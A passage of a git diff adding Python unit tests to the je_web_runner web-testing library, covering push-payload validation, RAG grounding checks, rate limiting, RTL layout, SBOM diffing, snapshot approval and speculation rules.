assert_no_leaks(report) + + def test_below_low_threshold(self): + report = ScanReport(findings=[Finding( + payload="x", severity=Severity.LOW, leaked=True, + response_excerpt="x", + )]) + with self.assertRaises(PromptInjectionScannerError): + assert_no_leaks(report, minimum_severity=Severity.LOW) + + +class TestToDict(unittest.TestCase): + + def test_severity_value(self): + f = Finding( + payload="x", severity=Severity.MEDIUM, + leaked=False, response_excerpt="", + ) + self.assertEqual(f.to_dict()["severity"], "medium") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_pull_to_refresh.py b/test/unit_test/test_pull_to_refresh.py new file mode 100644 index 0000000..9ea4efd --- /dev/null +++ b/test/unit_test/test_pull_to_refresh.py @@ -0,0 +1,89 @@ +"""Unit tests for je_web_runner.utils.pull_to_refresh.""" +import unittest + +from je_web_runner.utils.pull_to_refresh.refresh import ( + HARVEST_SCRIPT, + PullToRefreshError, + PullToRefreshSnapshot, + RefreshEvent, + assert_overscroll_contained, + assert_refresh_triggered, + assert_threshold_sensible, + parse_snapshot, +) + + +class TestScript(unittest.TestCase): + + def test_contains(self): + self.assertIn("overscrollBehaviorY", HARVEST_SCRIPT) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + snap = parse_snapshot({"overscroll_y": "contain", + "pull_threshold_attr": "80"}) + self.assertEqual(snap.pull_threshold_px, 80) + + def test_bad(self): + with self.assertRaises(PullToRefreshError): + parse_snapshot("nope") + + def test_non_numeric_threshold(self): + with self.assertRaises(PullToRefreshError): + parse_snapshot({"pull_threshold_attr": "loose"}) + + +class TestOverscroll(unittest.TestCase): + + def test_pass(self): + assert_overscroll_contained(PullToRefreshSnapshot(overscroll_y="contain")) + + def test_fail(self): + with self.assertRaises(PullToRefreshError): + assert_overscroll_contained(PullToRefreshSnapshot(overscroll_y="auto")) + + +class TestThreshold(unittest.TestCase): + + def test_pass(self): + assert_threshold_sensible(PullToRefreshSnapshot(pull_threshold_px=80)) + + def test_too_low(self): + with self.assertRaises(PullToRefreshError): + assert_threshold_sensible(PullToRefreshSnapshot(pull_threshold_px=10)) + + def test_too_high(self): + with self.assertRaises(PullToRefreshError): + assert_threshold_sensible(PullToRefreshSnapshot(pull_threshold_px=500)) + + def test_missing(self): + with self.assertRaises(PullToRefreshError): + assert_threshold_sensible(PullToRefreshSnapshot()) + + def test_bad_bounds(self): + with self.assertRaises(PullToRefreshError): + assert_threshold_sensible( + PullToRefreshSnapshot(pull_threshold_px=10), + min_px=0, max_px=10, + ) + + +class TestRefreshEvent(unittest.TestCase): + + def test_pass(self): + assert_refresh_triggered(RefreshEvent(fired=True, + network_refetched=True)) + + def test_no_handler(self): + with self.assertRaises(PullToRefreshError): + assert_refresh_triggered(RefreshEvent()) + + def test_no_network(self): + with self.assertRaises(PullToRefreshError): + assert_refresh_triggered(RefreshEvent(fired=True)) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_push_delivery.py b/test/unit_test/test_push_delivery.py new file mode 100644 index 0000000..dbcd97c --- /dev/null +++ b/test/unit_test/test_push_delivery.py @@ -0,0 +1,118 @@ +"""Unit tests for je_web_runner.utils.push_delivery.""" +import unittest + +from je_web_runner.utils.push_delivery.delivery import ( + PushDeliveryError, + assert_apns_payload, + assert_collapse_intent, + assert_fcm_payload, +) + + +def _good_fcm(): + return { + "message": { + "token": "device-token", + "notification": {"title": "T", "body": "B"}, + "android": {"ttl": "3600s"}, + }, + } + + +def _good_apns(): + return { + "aps": {"alert": {"title": "T", "body": "B"}, "badge": 1}, + } + + +class TestFcm(unittest.TestCase): + + def test_pass(self): + assert_fcm_payload(_good_fcm()) + + def test_no_message(self): + with self.assertRaises(PushDeliveryError): + assert_fcm_payload({}) + + def test_no_target(self): + with self.assertRaises(PushDeliveryError): + assert_fcm_payload({"message": {"notification": {}}}) + + def test_too_large(self): + big = _good_fcm() + big["message"]["notification"]["body"] = "x" * 5000 + with self.assertRaises(PushDeliveryError): + assert_fcm_payload(big) + + def test_pii_in_body(self): + bad = _good_fcm() + bad["message"]["notification"]["body"] = "Your card 4111 1111 1111 1111 expired" + with self.assertRaises(PushDeliveryError): + assert_fcm_payload(bad) + + def test_bad_ttl(self): + bad = _good_fcm() + bad["message"]["android"]["ttl"] = "0s" + with self.assertRaises(PushDeliveryError): + assert_fcm_payload(bad) + + def test_ttl_not_seconds(self): + bad = _good_fcm() + bad["message"]["android"]["ttl"] = "60" + with self.assertRaises(PushDeliveryError): + assert_fcm_payload(bad) + + def test_bad_payload(self): + with self.assertRaises(PushDeliveryError): + assert_fcm_payload("nope") + + +class TestApns(unittest.TestCase): + + def test_pass(self): + assert_apns_payload(_good_apns()) + + def test_missing_aps(self): + with self.assertRaises(PushDeliveryError): + assert_apns_payload({}) + + def test_empty_aps(self): + with self.assertRaises(PushDeliveryError): + assert_apns_payload({"aps": {}}) + + def test_pii_in_alert(self): + bad = _good_apns() + bad["aps"]["alert"]["title"] = "user@example.com order ready" + with self.assertRaises(PushDeliveryError): + assert_apns_payload(bad) + + def test_too_large(self): + big = _good_apns() + big["aps"]["alert"]["body"] = "x" * (5 * 1024 + 100) + with self.assertRaises(PushDeliveryError): + assert_apns_payload(big) + + +class TestCollapse(unittest.TestCase): + + def test_fcm_pass(self): + p = _good_fcm() + p["message"]["android"]["collapse_key"] = "chat:42" + assert_collapse_intent(p) + + def test_fcm_missing(self): + with self.assertRaises(PushDeliveryError): + assert_collapse_intent(_good_fcm()) + + def test_apns_pass(self): + p = _good_apns() + p["_apns_headers"] = {"apns-collapse-id": "chat:42"} + assert_collapse_intent(p) + + def test_apns_missing(self): + with self.assertRaises(PushDeliveryError): + assert_collapse_intent(_good_apns()) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_rag_grounding_assert.py b/test/unit_test/test_rag_grounding_assert.py new file mode 100644 index 0000000..70996a6 --- /dev/null +++ b/test/unit_test/test_rag_grounding_assert.py @@ -0,0 +1,145 @@ +"""Unit tests for je_web_runner.utils.rag_grounding_assert.""" +import unittest + +from je_web_runner.utils.rag_grounding_assert.grounding import ( + Chunk, + RagAnswer, + RagGroundingError, + assert_citations_in_retrieved, + assert_grounded, + assert_min_citations, + assert_no_hallucination, + find_unsupported_claims, + lexical_overlap_score, +) + + +class TestModels(unittest.TestCase): + + def test_chunk_id_required(self): + with self.assertRaises(RagGroundingError): + Chunk(chunk_id="", text="x") + + def test_text_must_be_str(self): + with self.assertRaises(RagGroundingError): + RagAnswer(text=123) + + +class TestCitations(unittest.TestCase): + + def test_pass(self): + assert_citations_in_retrieved( + RagAnswer(text="x", cited_chunk_ids=["a"]), + retrieved=[Chunk("a", "x")], + ) + + def test_fail(self): + with self.assertRaises(RagGroundingError): + assert_citations_in_retrieved( + RagAnswer(text="x", cited_chunk_ids=["b"]), + retrieved=[Chunk("a", "x")], + ) + + def test_min_citations_pass(self): + assert_min_citations( + RagAnswer(text="x", cited_chunk_ids=["a"]), minimum=1, + ) + + def test_min_citations_fail(self): + with self.assertRaises(RagGroundingError): + assert_min_citations( + RagAnswer(text="x", cited_chunk_ids=[]), minimum=1, + ) + + def test_bad_min(self): + with self.assertRaises(RagGroundingError): + assert_min_citations(RagAnswer(text="x"), minimum=0) + + +class TestOverlap(unittest.TestCase): + + def test_full_overlap(self): + score = lexical_overlap_score( + RagAnswer(text="quick brown fox"), + [Chunk("a", "the quick brown fox jumps")], + ) + self.assertEqual(score, 1.0) + + def test_partial(self): + score = lexical_overlap_score( + RagAnswer(text="quick brown banana"), + [Chunk("a", "quick brown fox")], + ) + self.assertAlmostEqual(score, 2 / 3, places=2) + + def test_empty(self): + self.assertEqual( + lexical_overlap_score(RagAnswer(text=""), [Chunk("a", "x")]), 0, + ) + + def test_grounded_pass(self): + assert_grounded( + RagAnswer(text="quick brown fox"), + [Chunk("a", "quick brown fox")], + min_overlap=0.8, + ) + + def test_grounded_fail(self): + with self.assertRaises(RagGroundingError): + assert_grounded( + RagAnswer(text="totally unrelated"), + [Chunk("a", "different document")], + min_overlap=0.8, + ) + + def test_bad_min(self): + with self.assertRaises(RagGroundingError): + assert_grounded(RagAnswer(text="x"), [], min_overlap=2) + + +class TestHallucination(unittest.TestCase): + + def test_supported(self): + unsupported = find_unsupported_claims( + RagAnswer(text="the cat sat on the mat"), + [Chunk("a", "the cat sat on the mat in the morning")], + min_phrase_len=3, + ) + self.assertEqual(unsupported, []) + + def test_unsupported(self): + unsupported = find_unsupported_claims( + RagAnswer(text="dragons can fly to the moon"), + [Chunk("a", "dogs can chase squirrels")], + min_phrase_len=3, + ) + self.assertGreater(len(unsupported), 0) + + def test_short_answer(self): + self.assertEqual( + find_unsupported_claims(RagAnswer(text="hi"), [], min_phrase_len=4), + [], + ) + + def test_bad_phrase_len(self): + with self.assertRaises(RagGroundingError): + find_unsupported_claims(RagAnswer(text="x"), [], min_phrase_len=1) + + def test_no_hallucination_pass(self): + assert_no_hallucination( + RagAnswer(text="the cat sat on the mat"), + [Chunk("a", "the cat sat on the mat in the morning")], + min_phrase_len=3, + ) + + def test_no_hallucination_fail(self): + with self.assertRaises(RagGroundingError): + assert_no_hallucination( + RagAnswer(text="dragons can fly to the moon and back"), + [Chunk("a", "dogs can chase squirrels")], + min_phrase_len=3, + ) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_rate_limit_assert.py b/test/unit_test/test_rate_limit_assert.py new file mode 100644 index 0000000..2c99eeb --- /dev/null +++ b/test/unit_test/test_rate_limit_assert.py @@ -0,0 +1,108 @@ +"""Unit tests for je_web_runner.utils.rate_limit_assert.""" +import unittest + +from je_web_runner.utils.rate_limit_assert.rate import ( + RateLimitAssertError, + RateLimitResponse, + assert_429_after_burst, + assert_recovery_after_retry_after, + assert_remaining_monotonic, + assert_retry_after_present, +) + + +def _ok(remaining=None): + headers = {} + if remaining is not None: + headers["X-RateLimit-Remaining"] = str(remaining) + return RateLimitResponse(status_code=200, headers=headers) + + +def _too_many(retry_after="1"): + return RateLimitResponse(status_code=429, + headers={"Retry-After": retry_after}) + + +class TestParseAccessors(unittest.TestCase): + + def test_retry_after(self): + self.assertEqual(_too_many("2").retry_after_seconds, 2) + + def test_bad_retry_after(self): + r = RateLimitResponse(status_code=429, + headers={"Retry-After": "soon"}) + self.assertIsNone(r.retry_after_seconds) + + def test_remaining(self): + self.assertEqual(_ok(5).remaining, 5) + + +class TestBurst(unittest.TestCase): + + def test_pass(self): + responses = [_ok()] * 5 + [_too_many()] + r = assert_429_after_burst(responses, after=5) + self.assertTrue(r.is_429) + + def test_no_429(self): + with self.assertRaises(RateLimitAssertError): + assert_429_after_burst([_ok()] * 6, after=5) + + def test_too_few(self): + with self.assertRaises(RateLimitAssertError): + assert_429_after_burst([_ok()], after=5) + + def test_bad_after(self): + with self.assertRaises(RateLimitAssertError): + assert_429_after_burst([], after=0) + + +class TestRetryAfter(unittest.TestCase): + + def test_pass(self): + assert_retry_after_present(_too_many("2")) + + def test_non_429(self): + with self.assertRaises(RateLimitAssertError): + assert_retry_after_present(_ok()) + + def test_missing(self): + with self.assertRaises(RateLimitAssertError): + assert_retry_after_present(RateLimitResponse(status_code=429)) + + def test_zero(self): + with self.assertRaises(RateLimitAssertError): + assert_retry_after_present(_too_many("0")) + + +class TestMonotonic(unittest.TestCase): + + def test_pass(self): + assert_remaining_monotonic([_ok(5), _ok(4), _ok(3)]) + + def test_fail(self): + with self.assertRaises(RateLimitAssertError): + assert_remaining_monotonic([_ok(5), _ok(10)]) + + def test_skip_no_header(self): + assert_remaining_monotonic([_ok(), _ok()]) + + +class TestRecovery(unittest.TestCase): + + def test_pass(self): + assert_recovery_after_retry_after(before=_too_many(), after=_ok()) + + def test_fail(self): + with self.assertRaises(RateLimitAssertError): + assert_recovery_after_retry_after( + before=_too_many(), after=_too_many(), + ) + + def test_before_not_429(self): + with self.assertRaises(RateLimitAssertError): + assert_recovery_after_retry_after(before=_ok(), after=_ok()) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_resource_hints_audit.py b/test/unit_test/test_resource_hints_audit.py new file mode 100644 index 0000000..037e5ce --- /dev/null +++ b/test/unit_test/test_resource_hints_audit.py @@ -0,0 +1,97 @@ +"""Unit tests for je_web_runner.utils.resource_hints_audit.""" +import unittest + +from je_web_runner.utils.resource_hints_audit.hints import ( + Hint, + HintKind, + ResourceHintsAuditError, + assert_no_unused_hints, + assert_origin_preconnected, + assert_preload_has_as, + find_unused_hints, + parse_hints, +) + + +HTML = """ + + + + +""" + + +class TestParse(unittest.TestCase): + + def test_basic(self): + hints = parse_hints(HTML) + kinds = {h.kind for h in hints} + self.assertIn(HintKind.PRELOAD, kinds) + self.assertIn(HintKind.PRECONNECT, kinds) + self.assertIn(HintKind.PREFETCH, kinds) + + def test_skip_unknown_rel(self): + hints = parse_hints('') + self.assertEqual(hints, []) + + def test_bad(self): + with self.assertRaises(ResourceHintsAuditError): + parse_hints(123) # NOSONAR python:S5655 - deliberate bad input + + +class TestPreloadAs(unittest.TestCase): + + def test_pass(self): + assert_preload_has_as([ + Hint(kind=HintKind.PRELOAD, href="/x.jpg", as_="image"), + ]) + + def test_fail(self): + with self.assertRaises(ResourceHintsAuditError): + assert_preload_has_as([ + Hint(kind=HintKind.PRELOAD, href="/x.css"), + ]) + + +class TestUnused(unittest.TestCase): + + def test_find(self): + hints = parse_hints(HTML) + unused = find_unused_hints(hints, used_urls=["/hero.jpg"]) + self.assertGreaterEqual(len(unused), 1) + + def test_assert_pass(self): + assert_no_unused_hints( + [Hint(kind=HintKind.PRELOAD, href="/x.jpg")], + used_urls=["/x.jpg"], + ) + + def test_assert_fail(self): + with self.assertRaises(ResourceHintsAuditError): + assert_no_unused_hints( + [Hint(kind=HintKind.PRELOAD, href="/x.jpg")], + used_urls=["/other.jpg"], + ) + + +class TestPreconnect(unittest.TestCase): + + def test_pass(self): + assert_origin_preconnected( + [Hint(kind=HintKind.PRECONNECT, href="https://cdn.example.com")], + origin="https://cdn.example.com", + ) + + def test_fail(self): + with self.assertRaises(ResourceHintsAuditError): + assert_origin_preconnected( + [], origin="https://cdn.example.com", + ) + + def test_empty_origin(self): + with self.assertRaises(ResourceHintsAuditError): + assert_origin_preconnected([], origin="") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_rtl_layout_verify.py b/test/unit_test/test_rtl_layout_verify.py new file mode 100644 index 0000000..f933252 --- /dev/null +++ b/test/unit_test/test_rtl_layout_verify.py @@ -0,0 +1,153 @@ +"""Unit tests for je_web_runner.utils.rtl_layout_verify.""" +import unittest + +from je_web_runner.utils.rtl_layout_verify.verify import ( + HARVEST_SCRIPT, + RtlLayoutVerifyError, + assert_bidi_isolation, + assert_document_rtl, + assert_logical_properties, + assert_visual_order_reversed, + parse_snapshot, +) + + +def _box(**kw): + base = { + "tag": "div", "text": "x", + "left": 0, "right": 0, "top": 0, "bottom": 0, + "direction": "rtl", "writingMode": "horizontal-tb", + "marginLeft": "0px", "marginRight": "0px", + "paddingLeft": "0px", "paddingRight": "0px", + "unicodeBidi": "normal", + } + base.update(kw) + return base + + +def _snap(document_dir="rtl", items=None): + return {"documentDir": document_dir, "items": items or []} + + +class TestParse(unittest.TestCase): + + def test_script_constant(self): + self.assertIn("getBoundingClientRect", HARVEST_SCRIPT) + + def test_basic(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": ".x", "boxes": [_box(left=100, right=200)], + }])) + self.assertEqual(snap.document_dir, "rtl") + self.assertEqual(len(snap.selectors[".x"]), 1) + + def test_skips_malformed(self): + snap = parse_snapshot(_snap("rtl", [ + "string", + {"selector": 1}, + {"selector": ".y", "boxes": ["str"]}, + ])) + self.assertEqual(snap.selectors[".y"], []) + + def test_non_dict(self): + with self.assertRaises(RtlLayoutVerifyError): + parse_snapshot("nope") + + +class TestDocumentDir(unittest.TestCase): + + def test_pass(self): + assert_document_rtl(parse_snapshot(_snap("rtl"))) + + def test_fail(self): + with self.assertRaises(RtlLayoutVerifyError): + assert_document_rtl(parse_snapshot(_snap("ltr"))) + + +class TestLogicalProperties(unittest.TestCase): + + def test_pass(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": ".x", + "boxes": [_box(marginLeft="0px", marginRight="8px")], + }])) + assert_logical_properties(snap, ".x") + + def test_fail_physical(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": ".x", + "boxes": [_box(marginLeft="8px", marginRight="0px")], + }])) + with self.assertRaises(RtlLayoutVerifyError): + assert_logical_properties(snap, ".x") + + def test_unknown_selector(self): + snap = parse_snapshot(_snap("rtl")) + with self.assertRaises(RtlLayoutVerifyError): + assert_logical_properties(snap, ".missing") + + +class TestVisualOrder(unittest.TestCase): + + def test_pass(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "ul li", + "boxes": [ + _box(left=300, right=400), # first child = rightmost + _box(left=150, right=250), + _box(left=0, right=100), + ], + }])) + assert_visual_order_reversed(snap, "ul li") + + def test_fail(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "ul li", + "boxes": [ + _box(left=0, right=100), # first child = leftmost = wrong + _box(left=300, right=400), + ], + }])) + with self.assertRaises(RtlLayoutVerifyError): + assert_visual_order_reversed(snap, "ul li") + + def test_need_two_siblings(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "x", "boxes": [_box()], + }])) + with self.assertRaises(RtlLayoutVerifyError): + assert_visual_order_reversed(snap, "x") + + +class TestBidi(unittest.TestCase): + + def test_pass_with_isolate(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "p", + "boxes": [_box(text="مرحبا John", unicodeBidi="isolate")], + }])) + assert_bidi_isolation(snap, "p") + + def test_pass_with_bdi(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "p", + "boxes": [_box(tag="bdi", text="John")], + }])) + assert_bidi_isolation(snap, "p") + + def test_fail(self): + snap = parse_snapshot(_snap("rtl", [{ + "selector": "p", + "boxes": [_box(text="مرحبا John")], + }])) + with self.assertRaises(RtlLayoutVerifyError): + assert_bidi_isolation(snap, "p") + + def test_unknown_selector(self): + snap = parse_snapshot(_snap("rtl")) + with self.assertRaises(RtlLayoutVerifyError): + assert_bidi_isolation(snap, "missing") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_sbom_diff.py b/test/unit_test/test_sbom_diff.py new file mode 100644 index 0000000..7eefd3c --- /dev/null +++ b/test/unit_test/test_sbom_diff.py @@ -0,0 +1,152 @@ +"""Unit tests for je_web_runner.utils.sbom_diff.""" +import unittest + +from je_web_runner.utils.sbom_diff.diff import ( + SbomDiffError, + SbomReport, + VersionChange, + assert_no_disallowed_licenses, + assert_no_new_vulnerable, + diff_sboms, + report_markdown, +) + + +def _component(name, version, licenses=None, purl=""): + return { + "name": name, + "version": version, + "purl": purl, + "licenses": [{"license": {"id": l}} for l in (licenses or [])], + } + + +def _sbom(*components, vulnerabilities=None): + s = {"components": list(components)} + if vulnerabilities is not None: + s["vulnerabilities"] = vulnerabilities + return s + + +class TestDiff(unittest.TestCase): + + def test_added_and_removed(self): + base = _sbom(_component("a", "1.0.0"), _component("b", "1.0.0")) + head = _sbom(_component("a", "1.0.0"), _component("c", "1.0.0")) + report = diff_sboms(base, head) + self.assertEqual([c.name for c in report.added], ["c"]) + self.assertEqual([c.name for c in report.removed], ["b"]) + + def test_upgrade(self): + base = _sbom(_component("lib", "1.0.0")) + head = _sbom(_component("lib", "1.2.0")) + report = diff_sboms(base, head) + self.assertEqual(len(report.upgraded), 1) + self.assertEqual(report.upgraded[0].head_version, "1.2.0") + + def test_downgrade(self): + base = _sbom(_component("lib", "2.0.0")) + head = _sbom(_component("lib", "1.0.0")) + report = diff_sboms(base, head) + self.assertEqual(len(report.downgraded), 1) + + def test_unknown_version_order_classified_as_upgrade(self): + base = _sbom(_component("lib", "main")) + head = _sbom(_component("lib", "release")) + report = diff_sboms(base, head) + self.assertEqual(len(report.upgraded), 1) + + def test_new_license(self): + base = _sbom(_component("a", "1", licenses=["MIT"])) + head = _sbom(_component("a", "1", licenses=["MIT"]), + _component("b", "1", licenses=["AGPL-3.0"])) + report = diff_sboms(base, head) + self.assertIn("AGPL-3.0", report.new_licenses) + + def test_new_vulnerable(self): + base = _sbom(_component("a", "1", purl="pkg:npm/a@1"), + vulnerabilities=[]) + head = _sbom(_component("a", "1", purl="pkg:npm/a@1"), + vulnerabilities=[ + {"affects": [{"ref": "pkg:npm/a@1"}]}]) + report = diff_sboms(base, head) + self.assertIn("pkg:npm/a@1", report.new_vulnerable) + + def test_no_changes(self): + s = _sbom(_component("a", "1")) + self.assertFalse(diff_sboms(s, s).has_changes) + + def test_bad_input(self): + with self.assertRaises(SbomDiffError): + diff_sboms("nope", {}) + with self.assertRaises(SbomDiffError): + diff_sboms({"components": "x"}, {}) + + def test_skips_bad_component_shape(self): + base = _sbom() + head = {"components": [ + "string-not-dict", + {"version": "1"}, # missing name + _component("ok", "1"), + ]} + report = diff_sboms(base, head) + self.assertEqual([c.name for c in report.added], ["ok"]) + + +class TestAsserts(unittest.TestCase): + + def test_no_new_vuln_pass(self): + assert_no_new_vulnerable(SbomReport()) + + def test_no_new_vuln_fail(self): + with self.assertRaises(SbomDiffError): + assert_no_new_vulnerable(SbomReport(new_vulnerable=["x"])) + + def test_disallowed_pass(self): + assert_no_disallowed_licenses(SbomReport(new_licenses=["MIT"]), + disallowed=["AGPL-3.0"]) + + def test_disallowed_fail(self): + with self.assertRaises(SbomDiffError): + assert_no_disallowed_licenses( + SbomReport(new_licenses=["AGPL-3.0"]), + disallowed=["agpl-3.0"], + ) + + def test_empty_disallowed_rejected(self): + with self.assertRaises(SbomDiffError): + assert_no_disallowed_licenses(SbomReport(), disallowed=[]) + + +class TestMarkdown(unittest.TestCase): + + def test_empty(self): + md = report_markdown(SbomReport()) + self.assertIn("No changes", md) + + def test_renders_all(self): + report = SbomReport( + added=[__import__("je_web_runner.utils.sbom_diff.diff", + fromlist=["Component"]).Component("a", "1")], + removed=[__import__("je_web_runner.utils.sbom_diff.diff", + fromlist=["Component"]).Component("b", "1")], + upgraded=[VersionChange("u", "1", "2")], + downgraded=[VersionChange("d", "2", "1")], + new_licenses=["MIT"], + new_vulnerable=["pkg:npm/x@1"], + ) + md = report_markdown(report) + self.assertIn("Added", md) + self.assertIn("Removed", md) + self.assertIn("Upgraded", md) + self.assertIn("Downgraded", md) + self.assertIn("New licenses", md) + self.assertIn("New vulnerable", md) + + def test_rejects_non_report(self): + with self.assertRaises(SbomDiffError): + report_markdown("nope") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_snapshot_diff_approval.py b/test/unit_test/test_snapshot_diff_approval.py new file mode 100644 index 0000000..5f69324 --- /dev/null +++ b/test/unit_test/test_snapshot_diff_approval.py @@ -0,0 +1,150 @@ +"""Unit tests for je_web_runner.utils.snapshot_diff_approval.""" +import json +import os +import tempfile +import unittest + +from je_web_runner.utils.snapshot_diff_approval.approval import ( + SnapshotDiffApprovalError, + SnapshotEntry, + Status, + approve, + assert_no_pending, + capture, + list_pending, + load, + reject, + save, +) + + +class TestCapture(unittest.TestCase): + + def test_first_time_pending(self): + reg = {} + result = capture(reg, name="hero", payload=b"abc") + self.assertEqual(reg["hero"].status, Status.PENDING) + self.assertEqual(result.baseline_sha, "") + + def test_match_baseline(self): + # Use a fresh baseline produced by capture+approve so the SHA + # matches the payload we'll re-capture below. + reg2 = {} + capture(reg2, name="hero", payload=b"abc") + approve(reg2, name="hero", reviewer="alice") + result = capture(reg2, name="hero", payload=b"abc") + self.assertFalse(result.changed) + + def test_diff_pending(self): + reg = {} + capture(reg, name="hero", payload=b"abc") + approve(reg, name="hero", reviewer="alice") + result = capture(reg, name="hero", payload=b"xyz") + self.assertTrue(result.changed) + self.assertEqual(reg["hero"].status, Status.PENDING) + + def test_bad_payload(self): + with self.assertRaises(SnapshotDiffApprovalError): + capture({}, name="x", payload="nope") + + def test_empty_name(self): + with self.assertRaises(SnapshotDiffApprovalError): + capture({}, name="", payload=b"x") + + +class TestApprove(unittest.TestCase): + + def test_pass(self): + reg = {} + capture(reg, name="hero", payload=b"abc") + entry = approve(reg, name="hero", reviewer="alice") + self.assertEqual(entry.status, Status.BASELINE) + + def test_unknown(self): + with self.assertRaises(SnapshotDiffApprovalError): + approve({}, name="missing", reviewer="x") + + def test_not_pending(self): + reg = {"hero": SnapshotEntry(name="hero", sha256="x", + status=Status.BASELINE, + updated_at="2026-01-01")} + with self.assertRaises(SnapshotDiffApprovalError): + approve(reg, name="hero", reviewer="alice") + + def test_no_reviewer(self): + reg = {} + capture(reg, name="x", payload=b"x") + with self.assertRaises(SnapshotDiffApprovalError): + approve(reg, name="x", reviewer="") + + +class TestReject(unittest.TestCase): + + def test_pass(self): + reg = {} + capture(reg, name="x", payload=b"x") + entry = reject(reg, name="x", reviewer="alice", note="ugly") + self.assertEqual(entry.status, Status.REJECTED) + self.assertEqual(entry.note, "ugly") + + def test_unknown(self): + with self.assertRaises(SnapshotDiffApprovalError): + reject({}, name="x", reviewer="alice") + + def test_no_reviewer(self): + reg = {} + capture(reg, name="x", payload=b"x") + with self.assertRaises(SnapshotDiffApprovalError): + reject(reg, name="x", reviewer="") + + +class TestList(unittest.TestCase): + + def test_pending(self): + reg = {} + capture(reg, name="a", payload=b"x") + self.assertEqual(len(list_pending(reg)), 1) + + +class TestAssert(unittest.TestCase): + + def test_pass(self): + assert_no_pending({}) + + def test_fail(self): + reg = {} + capture(reg, name="a", payload=b"x") + with self.assertRaises(SnapshotDiffApprovalError): + assert_no_pending(reg) + + +class TestSaveLoad(unittest.TestCase): + + def test_roundtrip(self): + reg = {} + capture(reg, name="hero", payload=b"x") + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "s.json") + save(path, reg) + loaded = load(path) + self.assertIn("hero", loaded) + + def test_load_missing(self): + with tempfile.TemporaryDirectory() as tmp: + self.assertEqual(load(os.path.join(tmp, "x.json")), {}) + + def test_save_empty_path(self): + with self.assertRaises(SnapshotDiffApprovalError): + save("", {}) + + def test_load_bad_root(self): + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "s.json") + with open(path, "w") as fh: + json.dump([], fh) + with self.assertRaises(SnapshotDiffApprovalError): + load(path) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_speculation_rules.py b/test/unit_test/test_speculation_rules.py new file mode 100644 index 0000000..780bca8 --- /dev/null +++ b/test/unit_test/test_speculation_rules.py @@ -0,0 +1,146 @@ +"""Unit tests for je_web_runner.utils.speculation_rules.""" +import unittest + +from je_web_runner.utils.speculation_rules.rules import ( + HARVEST_LOG_SCRIPT, + INSTALL_LISTENER_SCRIPT, + PrerenderLog, + SpeculationRule, + SpeculationRulesError, + assert_activated, + assert_fire_count, + assert_no_double_fire, + build_script_tag, + parse_log, +) + + +class TestSpeculationRule(unittest.TestCase): + + def test_list_needs_urls(self): + with self.assertRaises(SpeculationRulesError): + SpeculationRule(source="list") + + def test_unknown_source(self): + with self.assertRaises(SpeculationRulesError): + SpeculationRule(source="weird", urls=["/a"]) + + def test_bad_eagerness(self): + with self.assertRaises(SpeculationRulesError): + SpeculationRule(source="list", urls=["/a"], eagerness="urgent") + + +class TestBuildScript(unittest.TestCase): + + def test_renders_prerender(self): + tag = build_script_tag( + prerender=[SpeculationRule(source="list", urls=["/a", "/b"])], + ) + self.assertTrue(tag.startswith('